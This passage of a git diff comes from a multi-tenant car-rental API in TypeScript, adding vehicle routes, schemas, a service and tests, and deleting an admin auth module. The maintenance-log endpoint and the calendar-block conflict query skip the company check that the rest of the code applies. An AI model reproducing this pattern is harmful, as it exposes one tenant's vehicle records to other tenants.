prisma.vehicle.findFirst({ where: { id, companyId } }) +} + +export async function create(data: any) { + return prisma.vehicle.create({ data }) +} + +export async function updateById(id: string, data: any) { + return prisma.vehicle.update({ where: { id }, data }) +} + +export async function softDelete(id: string, companyId: string) { + return prisma.vehicle.updateMany({ where: { id, companyId }, data: { status: 'OUT_OF_SERVICE', isPublished: false } }) +} + +export async function setPublished(id: string, companyId: string, isPublished: boolean) { + return prisma.vehicle.updateMany({ where: { id, companyId }, data: { isPublished } }) +} + +export async function findReservationConflicts(vehicleId: string, companyId: string, start: Date, end: Date) { + return prisma.reservation.findMany({ + where: { + vehicleId, + companyId, + status: { in: ['CONFIRMED', 'ACTIVE'] }, + startDate: { lt: end }, + endDate: { gt: start }, + }, + select: { id: true, startDate: true, endDate: true, status: true }, + }) +} + +export async function findCalendarBlockConflicts(vehicleId: string, start: Date, end: Date) { + return prisma.vehicleCalendarBlock.findMany({ + where: { vehicleId, startDate: { lt: end }, endDate: { gt: start } }, + select: { id: true, startDate: true, endDate: true, type: true, reason: true }, + }) +} + +export async function findCalendarEvents(vehicleId: string, companyId: string, rangeStart: Date, rangeEnd: Date) { + return Promise.all([ + prisma.reservation.findMany({ + where: { + vehicleId, + companyId, + status: { in: ['DRAFT', 'CONFIRMED', 'ACTIVE'] }, + startDate: { lt: rangeEnd }, + endDate: { gt: rangeStart }, + }, + select: { + id: true, startDate: true, endDate: true, status: true, + customer: { select: { firstName: true, lastName: true } }, + }, + orderBy: { startDate: 'asc' }, + }), + prisma.vehicleCalendarBlock.findMany({ + where: { vehicleId, startDate: { lt: rangeEnd }, endDate: { gt: rangeStart } }, + orderBy: { startDate: 'asc' }, + }), + ]) +} + +export async function createCalendarBlock(data: any) { + return prisma.vehicleCalendarBlock.create({ data }) +} + +export async function deleteCalendarBlock(id: string, vehicleId: string) { + return prisma.vehicleCalendarBlock.deleteMany({ where: { id, vehicleId } }) +} + +export async function findMaintenanceLogs(vehicleId: string) { + return prisma.maintenanceLog.findMany({ where: { vehicleId }, orderBy: { performedAt: 'desc' } }) +} + +export async function createMaintenanceLog(data: any) { + return prisma.maintenanceLog.create({ data }) +} diff --git a/apps/api/src/modules/vehicles/vehicle.routes.ts b/apps/api/src/modules/vehicles/vehicle.routes.ts new file mode 100644 index 0000000..86b4ecf --- /dev/null +++ b/apps/api/src/modules/vehicles/vehicle.routes.ts @@ -0,0 +1,140 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseBody, parseQuery, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import { imageUpload, assertImageFiles } from '../../http/upload' +import * as service from './vehicle.service' +import { + vehicleSchema, listQuerySchema, availabilityQuerySchema, calendarQuerySchema, + calendarBlockSchema, maintenanceLogSchema, publishSchema, + idParamSchema, photoIdxSchema, blockIdParamSchema, +} from './vehicle.schemas' + +const router = Router() + +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/', async (req, res, next) => { + try { + const query = parseQuery(listQuerySchema, req) + const result = await service.listVehicles(req.companyId, query) + res.json(result) + } catch (err) { next(err) } +}) + +router.post('/', requireRole('MANAGER'), async (req, res, next) => { + try { + const body = parseBody(vehicleSchema, req) + const vehicle = await service.createVehicle(body, req.companyId) + created(res, vehicle) + } catch (err) { next(err) } +}) + +router.get('/:id', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const vehicle = await service.getVehicle(id, req.companyId) + ok(res, vehicle) + } catch (err) { next(err) } +}) + +router.patch('/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(vehicleSchema.partial(), req) + const vehicle = await service.updateVehicle(id, req.companyId, body) + ok(res, vehicle) + } catch (err) { next(err) } +}) + +router.delete('/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.deleteVehicle(id, req.companyId) + ok(res, { success: true }) + } catch (err) { next(err) } +}) + +router.post('/:id/photos', requireRole('MANAGER'), imageUpload.array('photos', 10), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const files = req.files as Express.Multer.File[] + assertImageFiles(files) + const updated = await service.uploadPhotos(id, req.companyId, files) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.delete('/:id/photos/:idx', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id, idx } = parseParams(photoIdxSchema, req) + const updated = await service.deletePhoto(id, req.companyId, parseInt(idx, 10)) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.patch('/:id/publish', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { isPublished } = parseBody(publishSchema, req) + await service.setPublished(id, req.companyId, isPublished) + ok(res, { success: true, isPublished }) + } catch (err) { next(err) } +}) + +router.get('/:id/availability', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { startDate, endDate } = parseQuery(availabilityQuerySchema, req) + const result = await service.checkAvailability(id, req.companyId, startDate, endDate) + ok(res, result) + } catch (err) { next(err) } +}) + +router.get('/:id/calendar', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { year, month } = parseQuery(calendarQuerySchema, req) + const events = await service.getCalendar(id, req.companyId, year, month) + ok(res, events) + } catch (err) { next(err) } +}) + +router.post('/:id/calendar/blocks', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(calendarBlockSchema, req) + const block = await service.createCalendarBlock(id, req.companyId, body) + created(res, block) + } catch (err) { next(err) } +}) + +router.delete('/:id/calendar/blocks/:blockId', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id, blockId } = parseParams(blockIdParamSchema, req) + await service.deleteCalendarBlock(id, req.companyId, blockId) + ok(res, { success: true }) + } catch (err) { next(err) } +}) + +router.get('/:id/maintenance', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const logs = await service.getMaintenanceLogs(id) + ok(res, logs) + } catch (err) { next(err) } +}) + +router.post('/:id/maintenance', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(maintenanceLogSchema, req) + const log = await service.createMaintenanceLog(id, req.companyId, body) + created(res, log) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/vehicles/vehicle.schemas.ts b/apps/api/src/modules/vehicles/vehicle.schemas.ts new file mode 100644 index 0000000..09bcc46 --- /dev/null +++ b/apps/api/src/modules/vehicles/vehicle.schemas.ts @@ -0,0 +1,61 @@ +import { z } from 'zod' + +export const vehicleSchema = z.object({ + make: z.string().min(1), + model: z.string().min(1), + year: z.number().int().min(1990).max(new Date().getFullYear() + 1), + color: z.string().default(''), + licensePlate: z.string().min(1), + vin: z.string().optional(), + category: z.enum(['ECONOMY', 'COMPACT', 'MIDSIZE', 'FULLSIZE', 'SUV', 'LUXURY', 'VAN', 'TRUCK']), + seats: z.number().int().min(1).max(20).default(5), + transmission: z.enum(['AUTOMATIC', 'MANUAL']).default('AUTOMATIC'), + fuelType: z.enum(['GASOLINE', 'DIESEL', 'ELECTRIC', 'HYBRID']).default('GASOLINE'), + features: z.array(z.string()).default([]), + dailyRate: z.number().int().min(0), + mileage: z.number().int().optional(), + notes: z.string().optional(), + isPublished: z.boolean().default(true), + status: z.enum(['AVAILABLE', 'RENTED', 'MAINTENANCE', 'OUT_OF_SERVICE']).optional(), +}) + +export const listQuerySchema = z.object({ + status: z.string().optional(), + category: z.string().optional(), + published: z.string().optional(), + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const availabilityQuerySchema = z.object({ + startDate: z.string(), + endDate: z.string(), +}) + +export const calendarQuerySchema = z.object({ + year: z.coerce.number().int(), + month: z.coerce.number().int().min(1).max(12), +}) + +export const calendarBlockSchema = z.object({ + startDate: z.string().datetime({ offset: true }).or(z.string().regex(/^\d{4}-\d{2}-\d{2}$/)), + endDate: z.string().datetime({ offset: true }).or(z.string().regex(/^\d{4}-\d{2}-\d{2}$/)), + reason: z.string().optional(), + type: z.enum(['MANUAL', 'MAINTENANCE']).default('MANUAL'), +}) + +export const maintenanceLogSchema = z.object({ + type: z.string().min(1), + description: z.string().optional(), + cost: z.number().int().optional(), + mileage: z.number().int().optional(), + performedAt: z.string().datetime(), + nextDueAt: z.string().datetime().optional(), + nextDueMileage: z.number().int().optional(), +}) + +export const publishSchema = z.object({ isPublished: z.boolean() }) + +export const idParamSchema = z.object({ id: z.string() }) +export const photoIdxSchema = z.object({ id: z.string(), idx: z.string() }) +export const blockIdParamSchema = z.object({ id: z.string(), blockId: z.string() }) diff --git a/apps/api/src/modules/vehicles/vehicle.service.ts b/apps/api/src/modules/vehicles/vehicle.service.ts new file mode 100644 index 0000000..4832ce1 --- /dev/null +++ b/apps/api/src/modules/vehicles/vehicle.service.ts @@ -0,0 +1,126 @@ +import { uploadImage } from '../../lib/storage' +import { NotFoundError, ValidationError } from '../../http/errors' +import { presentVehicle, presentVehicleList } from './vehicle.presenter' +import * as repo from './vehicle.repo' + +export async function listVehicles(companyId: string, query: { status?: string; category?: string; published?: string; page?: number; pageSize?: number }) { + const page = query.page ?? 1 + const pageSize = query.pageSize ?? 20 + const { status, category, published } = query + const where: any = { companyId } + if (status) where.status = status + if (category) where.category = category + if (published !== undefined) where.isPublished = published === 'true' + const [vehicles, total] = await repo.findMany(where, (page - 1) * pageSize, pageSize) + return presentVehicleList(vehicles.map(presentVehicle), { total, page, pageSize, totalPages: Math.ceil(total / pageSize) }) +} + +export async function getVehicle(id: string, companyId: string) { + const vehicle = await repo.findById(id, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + return presentVehicle(vehicle) +} + +export async function createVehicle(data: any, companyId: string) { + return presentVehicle(await repo.create({ ...data, companyId })) +} + +export async function updateVehicle(id: string, companyId: string, data: any) { + const patch = { ...data } + if (patch.status === 'MAINTENANCE' || patch.status === 'OUT_OF_SERVICE') { + patch.isPublished = false + } else if (patch.status === 'AVAILABLE' || patch.status === 'RENTED') { + patch.isPublished = true + } + const existing = await repo.findFirst(id, companyId) + if (!existing) throw new NotFoundError('Vehicle not found') + return presentVehicle(await repo.updateById(id, patch)) +} + +export async function deleteVehicle(id: string, companyId: string) { + return repo.softDelete(id, companyId) +} + +export async function uploadPhotos(id: string, companyId: string, files: Express.Multer.File[]) { + const vehicle = await repo.findById(id, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + const urls = await Promise.all(files.map((f) => uploadImage(f.buffer, `companies/${companyId}/vehicles`))) + return presentVehicle(await repo.updateById(id, { photos: [...vehicle.photos, ...urls] })) +} + +export async function deletePhoto(id: string, companyId: string, idx: number) { + const vehicle = await repo.findById(id, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + const photos = vehicle.photos.filter((_: string, i: number) => i !== idx) + return presentVehicle(await repo.updateById(id, { photos })) +} + +export async function setPublished(id: string, companyId: string, isPublished: boolean) { + await repo.setPublished(id, companyId, isPublished) +} + +export async function checkAvailability(id: string, companyId: string, startDate: string, endDate: string) { + const start = new Date(startDate) + const end = new Date(endDate) + const [conflicts, blocks] = await Promise.all([ + repo.findReservationConflicts(id, companyId, start, end), + repo.findCalendarBlockConflicts(id, start, end), + ]) + return { available: conflicts.length === 0 && blocks.length === 0, conflicts, blocks } +} + +export async function getCalendar(id: string, companyId: string, year: number, month: number) { + const vehicle = await repo.findById(id, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + const rangeStart = new Date(year, month - 1, 1) + const rangeEnd = new Date(year, month, 1) + const [reservations, blocks] = await repo.findCalendarEvents(id, companyId, rangeStart, rangeEnd) + return [ + ...reservations.map((r: any) => ({ + id: r.id, + type: 'RESERVATION' as const, + startDate: r.startDate, + endDate: r.endDate, + status: r.status, + label: r.customer ? `${r.customer.firstName} ${r.customer.lastName}` : 'Reserved', + })), + ...blocks.map((b: any) => ({ + id: b.id, + type: b.type === 'MAINTENANCE' ? ('MAINTENANCE' as const) : ('BLOCK' as const), + startDate: b.startDate, + endDate: b.endDate, + status: null, + label: b.reason ?? (b.type === 'MAINTENANCE' ? 'Maintenance' : 'Blocked'), + })), + ] +} + +export async function createCalendarBlock(id: string, companyId: string, data: { startDate: string; endDate: string; reason?: string; type?: 'MANUAL' | 'MAINTENANCE' }) { + const start = new Date(data.startDate) + const end = new Date(data.endDate) + if (end <= start) throw new ValidationError('endDate must be after startDate') + const vehicle = await repo.findById(id, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + return repo.createCalendarBlock({ vehicleId: id, startDate: start, endDate: end, reason: data.reason, type: data.type ?? 'MANUAL' }) +} + +export async function deleteCalendarBlock(vehicleId: string, companyId: string, blockId: string) { + const vehicle = await repo.findById(vehicleId, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + await repo.deleteCalendarBlock(blockId, vehicleId) +} + +export async function getMaintenanceLogs(id: string) { + return repo.findMaintenanceLogs(id) +} + +export async function createMaintenanceLog(id: string, companyId: string, data: any) { + const vehicle = await repo.findById(id, companyId) + if (!vehicle) throw new NotFoundError('Vehicle not found') + return repo.createMaintenanceLog({ + ...data, + vehicleId: id, + performedAt: new Date(data.performedAt), + nextDueAt: data.nextDueAt ? new Date(data.nextDueAt) : undefined, + }) +} diff --git a/apps/api/src/modules/vehicles/vehicle.test.ts b/apps/api/src/modules/vehicles/vehicle.test.ts new file mode 100644 index 0000000..667c4ca --- /dev/null +++ b/apps/api/src/modules/vehicles/vehicle.test.ts @@ -0,0 +1,125 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest' +import * as repo from './vehicle.repo' +import * as service from './vehicle.service' + +vi.mock('./vehicle.repo') +vi.mock('../../lib/storage', () => ({ + uploadImage: vi.fn().mockResolvedValue('http://localhost:4000/storage/vehicles/test.jpg'), +})) + +const mockVehicle = { + id: 'veh_1', + companyId: 'comp_1', + make: 'Toyota', + model: 'Camry', + year: 2022, + licensePlate: 'ABC-123', + status: 'AVAILABLE', + isPublished: true, + photos: [], + dailyRate: 500, +} + +beforeEach(() => { + vi.clearAllMocks() +}) + +describe('vehicle.service', () => { + describe('createVehicle', () => { + it('creates a vehicle with companyId', async () => { + vi.mocked(repo.create).mockResolvedValue(mockVehicle as any) + const result = await service.createVehicle({ make: 'Toyota', model: 'Camry', year: 2022, licensePlate: 'ABC-123', dailyRate: 500 }, 'comp_1') + expect(repo.create).toHaveBeenCalledWith(expect.objectContaining({ companyId: 'comp_1' })) + expect(result).toEqual(mockVehicle) + }) + }) + + describe('updateVehicle', () => { + it('throws NotFoundError when vehicle does not belong to company', async () => { + vi.mocked(repo.findFirst).mockResolvedValue(null) + await expect(service.updateVehicle('veh_1', 'comp_1', { make: 'Honda' })).rejects.toThrow('Vehicle not found') + }) + + it('sets isPublished=false when status is MAINTENANCE', async () => { + vi.mocked(repo.findFirst).mockResolvedValue(mockVehicle as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...mockVehicle, status: 'MAINTENANCE', isPublished: false } as any) + await service.updateVehicle('veh_1', 'comp_1', { status: 'MAINTENANCE' }) + expect(repo.updateById).toHaveBeenCalledWith('veh_1', expect.objectContaining({ isPublished: false })) + }) + + it('sets isPublished=true when status is AVAILABLE', async () => { + vi.mocked(repo.findFirst).mockResolvedValue({ ...mockVehicle, status: 'MAINTENANCE' } as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...mockVehicle, status: 'AVAILABLE', isPublished: true } as any) + await service.updateVehicle('veh_1', 'comp_1', { status: 'AVAILABLE' }) + expect(repo.updateById).toHaveBeenCalledWith('veh_1', expect.objectContaining({ isPublished: true })) + }) + }) + + describe('uploadPhotos', () => { + it('appends new photo URLs to existing photos', async () => { + const vehicleWithPhotos = { ...mockVehicle, photos: ['http://localhost:4000/storage/vehicles/existing.jpg'] } + vi.mocked(repo.findById).mockResolvedValue(vehicleWithPhotos as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...vehicleWithPhotos, photos: [...vehicleWithPhotos.photos, 'http://localhost:4000/storage/vehicles/test.jpg'] } as any) + await service.uploadPhotos('veh_1', 'comp_1', [{ buffer: Buffer.from('') } as any]) + expect(repo.updateById).toHaveBeenCalledWith('veh_1', { + photos: ['http://localhost:4000/storage/vehicles/existing.jpg', 'http://localhost:4000/storage/vehicles/test.jpg'], + }) + }) + }) + + describe('deletePhoto', () => { + it('removes photo at the given index', async () => { + const photos = ['url_0', 'url_1', 'url_2'] + vi.mocked(repo.findById).mockResolvedValue({ ...mockVehicle, photos } as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...mockVehicle, photos: ['url_0', 'url_2'] } as any) + await service.deletePhoto('veh_1', 'comp_1', 1) + expect(repo.updateById).toHaveBeenCalledWith('veh_1', { photos: ['url_0', 'url_2'] }) + }) + }) + + describe('checkAvailability', () => { + it('returns available=true when no conflicts', async () => { + vi.mocked(repo.findReservationConflicts).mockResolvedValue([]) + vi.mocked(repo.findCalendarBlockConflicts).mockResolvedValue([]) + const result = await service.checkAvailability('veh_1', 'comp_1', '2025-06-01T00:00:00Z', '2025-06-07T00:00:00Z') + expect(result.available).toBe(true) + expect(result.conflicts).toHaveLength(0) + expect(result.blocks).toHaveLength(0) + }) + + it('returns available=false when reservation conflict exists', async () => { + vi.mocked(repo.findReservationConflicts).mockResolvedValue([{ id: 'res_1', startDate: new Date(), endDate: new Date(), status: 'CONFIRMED' }] as any) + vi.mocked(repo.findCalendarBlockConflicts).mockResolvedValue([]) + const result = await service.checkAvailability('veh_1', 'comp_1', '2025-06-01T00:00:00Z', '2025-06-07T00:00:00Z') + expect(result.available).toBe(false) + expect(result.conflicts).toHaveLength(1) + }) + + it('returns available=false when calendar block conflict exists', async () => { + vi.mocked(repo.findReservationConflicts).mockResolvedValue([]) + vi.mocked(repo.findCalendarBlockConflicts).mockResolvedValue([{ id: 'block_1', startDate: new Date(), endDate: new Date(), type: 'MANUAL', reason: null }] as any) + const result = await service.checkAvailability('veh_1', 'comp_1', '2025-06-01T00:00:00Z', '2025-06-07T00:00:00Z') + expect(result.available).toBe(false) + expect(result.blocks).toHaveLength(1) + }) + }) + + describe('createCalendarBlock', () => { + it('throws ValidationError when endDate is before startDate', async () => { + await expect( + service.createCalendarBlock('veh_1', 'comp_1', { startDate: '2025-06-07T00:00:00Z', endDate: '2025-06-01T00:00:00Z' }), + ).rejects.toThrow('endDate must be after startDate') + }) + + it('creates a calendar block', async () => { + vi.mocked(repo.findById).mockResolvedValue(mockVehicle as any) + vi.mocked(repo.createCalendarBlock).mockResolvedValue({ id: 'block_1' } as any) + const result = await service.createCalendarBlock('veh_1', 'comp_1', { + startDate: '2025-06-01T00:00:00Z', + endDate: '2025-06-07T00:00:00Z', + type: 'MANUAL', + }) + expect(result).toEqual({ id: 'block_1' }) + }) + }) +}) diff --git a/apps/api/src/routes/webhooks.ts b/apps/api/src/modules/webhooks/webhook.routes.ts similarity index 100% rename from apps/api/src/routes/webhooks.ts rename to apps/api/src/modules/webhooks/webhook.routes.ts diff --git a/apps/api/src/routes/admin.ts b/apps/api/src/routes/admin.ts deleted file mode 100644 index 848147b..0000000 --- a/apps/api/src/routes/admin.ts +++ /dev/null @@ -1,875 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import bcrypt from 'bcryptjs' -import jwt from 'jsonwebtoken' -import crypto from 'crypto' -import { authenticator } from 'otplib' -import qrcode from 'qrcode' -import { prisma } from '../lib/prisma' -import { requireAdminAuth, requireAdminRole } from '../middleware/requireAdminAuth' -import { getMarketplaceHomepageContent, saveMarketplaceHomepageContent } from '../services/platformContentService' -import { generateInvoicePdf, buildInvoiceNumber } from '../services/invoicePdfService' -import { sendTransactionalEmail } from '../services/notificationService' -import type { MarketplaceHomepageContent, MarketplaceHomepageMetric, MarketplaceHomepagePillar, MarketplaceHomepageSectionType, MarketplaceHomepageStep } from '@rentaldrivego/types' - -const router = Router() - -const permissionSchema = z.object({ - resource: z.enum(['COMPANIES', 'COMPANY_EMPLOYEES', 'SUBSCRIPTIONS', 'PAYMENTS', 'OFFERS', 'RENTERS', 'ADMIN_USERS', 'AUDIT_LOGS', 'PLATFORM_METRICS']), - actions: z.array(z.enum(['READ', 'CREATE', 'UPDATE', 'DELETE', 'SUSPEND', 'IMPERSONATE'])).min(1), -}) - -const nullableString = z.union([z.string(), z.null()]).optional() -const nullableEmail = z.union([z.string().email(), z.null()]).optional() -const nullableUrl = z.union([z.string().url(), z.null()]).optional() -const nullableDate = z.union([ - z.string().datetime(), - z.string().regex(/^\d{4}-\d{2}-\d{2}$/), - z.null(), -]).optional() - -const homePageConfigSchema = z.object({ - heroTitle: nullableString, - heroDescription: nullableString, - viewOffersLabel: nullableString, - viewPricingLabel: nullableString, - contactCompanyLabel: nullableString, - activeOffersTitle: nullableString, - seeAllOffersLabel: nullableString, - noActiveOffersLabel: nullableString, - publishedVehiclesTitle: nullableString, - viewVehicleLabel: nullableString, - pricingEyebrow: nullableString, - pricingTitle: nullableString, - pricingDescription: nullableString, - showOffers: z.boolean().optional(), - showVehicles: z.boolean().optional(), - showPricing: z.boolean().optional(), - layout: z.object({ - items: z.array(z.object({ - id: z.string().min(1), - type: z.enum(['hero', 'offers', 'vehicles', 'pricing']), - x: z.number().int().min(1), - y: z.number().int().min(1), - w: z.number().int().min(1), - h: z.number().int().min(1), - })), - }).optional(), -}).optional() - -const menuConfigSchema = z.object({ - aboutLabel: nullableString, - vehiclesLabel: nullableString, - offersLabel: nullableString, - pricingLabel: nullableString, - blogLabel: nullableString, - contactLabel: nullableString, - bookCarLabel: nullableString, - siteNavigationLabel: nullableString, - showAbout: z.boolean().optional(), - showVehicles: z.boolean().optional(), - showOffers: z.boolean().optional(), - showPricing: z.boolean().optional(), - showBlog: z.boolean().optional(), - showContact: z.boolean().optional(), - pageSections: z.object({ - home: z.object({ - hero: z.boolean().optional(), - offers: z.boolean().optional(), - vehicles: z.boolean().optional(), - pricing: z.boolean().optional(), - }).optional(), - about: z.object({ - hero: z.boolean().optional(), - highlights: z.boolean().optional(), - details: z.boolean().optional(), - }).optional(), - offers: z.object({ - header: z.boolean().optional(), - grid: z.boolean().optional(), - }).optional(), - pricing: z.object({ - hero: z.boolean().optional(), - plans: z.boolean().optional(), - payments: z.boolean().optional(), - faq: z.boolean().optional(), - }).optional(), - vehicles: z.object({ - header: z.boolean().optional(), - filters: z.boolean().optional(), - grid: z.boolean().optional(), - }).optional(), - vehicleDetail: z.object({ - gallery: z.boolean().optional(), - summary: z.boolean().optional(), - }).optional(), - blog: z.object({ - hero: z.boolean().optional(), - posts: z.boolean().optional(), - }).optional(), - contact: z.object({ - content: z.boolean().optional(), - }).optional(), - booking: z.object({ - content: z.boolean().optional(), - }).optional(), - bookingConfirmation: z.object({ - hero: z.boolean().optional(), - summary: z.boolean().optional(), - actions: z.boolean().optional(), - }).optional(), - }).optional(), -}).optional() - -const marketplaceMetricSchema: z.ZodType = z.object({ - value: z.string().min(1), - label: z.string().min(1), -}) - -const marketplacePillarSchema: z.ZodType = z.object({ - title: z.string().min(1), - body: z.string().min(1), -}) - -const marketplaceStepSchema: z.ZodType = z.object({ - step: z.string().min(1), - title: z.string().min(1), - body: z.string().min(1), -}) - -const marketplaceSectionSchema: z.ZodType = z.enum([ - 'hero', - 'surface', - 'pillars', - 'audiences', - 'features', - 'steps', - 'closing', -]) - -const marketplaceHomepageContentSchema: z.ZodType = z.object({ - sections: z.array(marketplaceSectionSchema).min(1), - heroKicker: z.string().min(1), - heroTitle: z.string().min(1), - heroBody: z.string().min(1), - startTrial: z.string().min(1), - exploreVehicles: z.string().min(1), - surfaceLabel: z.string().min(1), - surfaceTitle: z.string().min(1), - surfaceBody: z.string().min(1), - liveLabel: z.string().min(1), - trustedFleets: z.string().min(1), - brandedFlows: z.string().min(1), - multiTenant: z.string().min(1), - companyKicker: z.string().min(1), - companyTitle: z.string().min(1), - companyBody: z.string().min(1), - renterKicker: z.string().min(1), - renterTitle: z.string().min(1), - renterBody: z.string().min(1), - pillars: z.array(marketplacePillarSchema).length(3), - metrics: z.array(marketplaceMetricSchema).length(3), - featureLabel: z.string().min(1), - features: z.array(z.string().min(1)).min(1), - stepsTitle: z.string().min(1), - steps: z.array(marketplaceStepSchema).length(3), - stepLabel: z.string().min(1), - readyKicker: z.string().min(1), - readyTitle: z.string().min(1), - readyBody: z.string().min(1), - viewPricing: z.string().min(1), - createWorkspace: z.string().min(1), -}) - -const marketplaceHomepageConfigSchema = z.object({ - en: marketplaceHomepageContentSchema, - fr: marketplaceHomepageContentSchema, - ar: marketplaceHomepageContentSchema, -}) - -const adminCompanyUpdateSchema = z.object({ - company: z.object({ - name: z.string().min(1).optional(), - slug: z.string().min(1).optional(), - email: z.string().email().optional(), - phone: nullableString, - status: z.enum(['PENDING', 'TRIALING', 'ACTIVE', 'PAST_DUE', 'SUSPENDED', 'CANCELLED']).optional(), - subscriptionPaymentRef: nullableString, - }).optional(), - subscription: z.object({ - plan: z.enum(['STARTER', 'GROWTH', 'PRO']).optional(), - billingPeriod: z.enum(['MONTHLY', 'ANNUAL']).optional(), - status: z.enum(['TRIALING', 'ACTIVE', 'PAST_DUE', 'CANCELLED', 'UNPAID']).optional(), - currency: z.enum(['MAD', 'USD', 'EUR']).optional(), - trialStartAt: nullableDate, - trialEndAt: nullableDate, - currentPeriodStart: nullableDate, - currentPeriodEnd: nullableDate, - cancelledAt: nullableDate, - cancelAtPeriodEnd: z.boolean().optional(), - }).optional(), - brand: z.object({ - displayName: z.string().min(1).optional(), - tagline: nullableString, - subdomain: z.string().min(1).optional(), - customDomain: nullableString, - publicEmail: nullableEmail, - publicPhone: nullableString, - publicAddress: nullableString, - publicCity: nullableString, - publicCountry: nullableString, - websiteUrl: nullableUrl, - whatsappNumber: nullableString, - defaultLocale: z.string().min(2).optional(), - defaultCurrency: z.enum(['MAD', 'USD', 'EUR']).optional(), - isListedOnMarketplace: z.boolean().optional(), - homePageConfig: homePageConfigSchema, - menuConfig: menuConfigSchema, - }).optional(), - contractSettings: z.object({ - legalName: nullableString, - registrationNumber: nullableString, - taxId: nullableString, - terms: z.string().optional(), - fuelPolicyType: z.enum(['FULL_TO_FULL', 'FULL_TO_EMPTY', 'SAME_TO_SAME', 'PREPAID', 'FREE']).optional(), - lateFeePerHour: z.number().int().nullable().optional(), - taxRate: z.number().nullable().optional(), - signatureRequired: z.boolean().optional(), - showTax: z.boolean().optional(), - }).optional(), - accountingSettings: z.object({ - reportingPeriod: z.enum(['WEEKLY', 'MONTHLY', 'QUARTERLY', 'ANNUAL']).optional(), - fiscalYearStart: z.number().int().min(1).max(12).optional(), - currency: z.enum(['MAD', 'USD', 'EUR']).optional(), - accountantEmail: nullableEmail, - accountantName: nullableString, - autoSendReport: z.boolean().optional(), - reportFormat: z.enum(['PDF', 'CSV', 'BOTH']).optional(), - }).optional(), -}) - -function parseOptionalDate(value?: string | null) { - if (!value) return null - return new Date(value) -} - -function toAuditJson(value: T) { - return JSON.parse(JSON.stringify(value)) -} - -function signAdminToken(adminId: string) { - return jwt.sign({ sub: adminId, type: 'admin' }, process.env.JWT_SECRET!, { expiresIn: '8h' }) -} - -// ─── Auth ───────────────────────────────────────────────────── - -router.post('/auth/login', async (req, res, next) => { - try { - const { email, password, totpCode } = z.object({ email: z.string().email().max(255).trim().toLowerCase(), password: z.string().max(128), totpCode: z.string().length(6).optional() }).parse(req.body) - const admin = await prisma.adminUser.findUnique({ where: { email } }) - if (!admin || !admin.isActive) return res.status(401).json({ error: 'invalid_credentials', message: 'Invalid email or password', statusCode: 401 }) - - const valid = await bcrypt.compare(password, admin.passwordHash) - if (!valid) return res.status(401).json({ error: 'invalid_credentials', message: 'Invalid email or password', statusCode: 401 }) - - if (admin.totpEnabled) { - if (!totpCode) return res.status(401).json({ error: 'totp_required', message: '2FA code required', statusCode: 401 }) - const valid2fa = authenticator.verify({ token: totpCode, secret: admin.totpSecret! }) - if (!valid2fa) return res.status(401).json({ error: 'invalid_totp', message: 'Invalid 2FA code', statusCode: 401 }) - } - - await prisma.adminUser.update({ where: { id: admin.id }, data: { lastLoginAt: new Date(), lastLoginIp: req.ip } }) - const token = signAdminToken(admin.id) - - await prisma.auditLog.create({ data: { adminUserId: admin.id, action: 'ADMIN_LOGIN', resource: 'AdminUser', resourceId: admin.id, ipAddress: req.ip, userAgent: req.headers['user-agent'] } }) - - res.json({ data: { token, admin: { id: admin.id, email: admin.email, firstName: admin.firstName, lastName: admin.lastName, role: admin.role, totpEnabled: admin.totpEnabled } } }) - } catch (err) { next(err) } -}) - -router.get('/auth/me', requireAdminAuth, (req, res) => { - const { passwordHash, totpSecret, ...safe } = req.admin as any - res.json({ data: safe }) -}) - -router.post('/auth/2fa/setup', requireAdminAuth, async (req, res, next) => { - try { - const secret = authenticator.generateSecret() - await prisma.adminUser.update({ where: { id: req.admin.id }, data: { totpSecret: secret } }) - const otpauth = authenticator.keyuri(req.admin.email, 'RentalDriveGo Admin', secret) - const qr = await qrcode.toDataURL(otpauth) - res.json({ data: { secret, qrCode: qr } }) - } catch (err) { next(err) } -}) - -router.post('/auth/2fa/verify', requireAdminAuth, async (req, res, next) => { - try { - const { code } = z.object({ code: z.string().length(6) }).parse(req.body) - const admin = await prisma.adminUser.findUniqueOrThrow({ where: { id: req.admin.id } }) - if (!admin.totpSecret) return res.status(400).json({ error: 'no_totp_secret', message: '2FA setup not initiated', statusCode: 400 }) - const valid = authenticator.verify({ token: code, secret: admin.totpSecret }) - if (!valid) return res.status(400).json({ error: 'invalid_code', message: 